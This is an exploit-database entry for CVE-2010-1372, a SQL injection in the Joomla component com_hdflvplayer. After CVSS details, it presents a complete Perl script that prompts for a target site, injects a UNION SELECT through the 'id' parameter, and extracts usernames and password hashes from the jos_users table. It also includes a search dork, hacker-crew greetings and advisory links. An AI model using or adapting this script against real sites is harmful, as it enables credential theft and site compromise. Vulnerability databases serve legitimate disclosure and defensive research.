Joomla Component com_hdflvplayer 1.3 SQL injection exploit - (id)

2010.04.17
Credit: kaMtiEz
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-1372
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w ############################################################################################### # # [~] Joomla Component com_hdflvplayer SQL injection exploit - (id) # [~] Author : kaMtiEz (kamzcrew@yahoo.com) # [~] Homepage : http://www.indonesiancoder.com # [~] Date : 15 February, 2010 # ############################################################################################### # # [ Software Information ] # # [+] Vendor : http://www.hdflvplayer.net/ # [+] Price : $ 99.00 # [+] Vulnerability : SQL injection # [+] Dork : inurl:"CIHUY" # [+] Type : commercial # ############################################################################################### # # USAGE : perl kaMz.pl # ############################################################################################### print "\t\t[!]=========================================================[!]\n\n"; print "\t\t [~] INDONESIANCODER TEAM [~] \n\n"; print "\t\t[!]=========================================================[!]\n\n"; print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n"; print "\t\t [~] by kaMtiEz [~] \n\n"; print "\t\t[!]=========================================================[!]\n\n"; use LWP::UserAgent; print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:"; chomp(my $IBL13Z=<STDIN>); $kaMtiEz="concat(username,0x3a,password)"; $tukulesto="jos_users"; $pathloader="com_hdflvplayer"; $r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n"; $r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--"; $gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom)); $contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){ print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n"; } else{print "\n[+] Exploit GAGAL GAN ![+]\n"; } ############################################################################################## # # GREETZZZZZ : # # INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah # tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack # Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck # Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk # ##############################################################################################

References:

http://xforce.iss.net/xforce/xfdb/56516
http://www.securityfocus.com/bid/38401
http://secunia.com/advisories/38691
http://packetstormsecurity.org/1002-exploits/joomlahdflvplayer-sql.txt
http://osvdb.org/62570


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top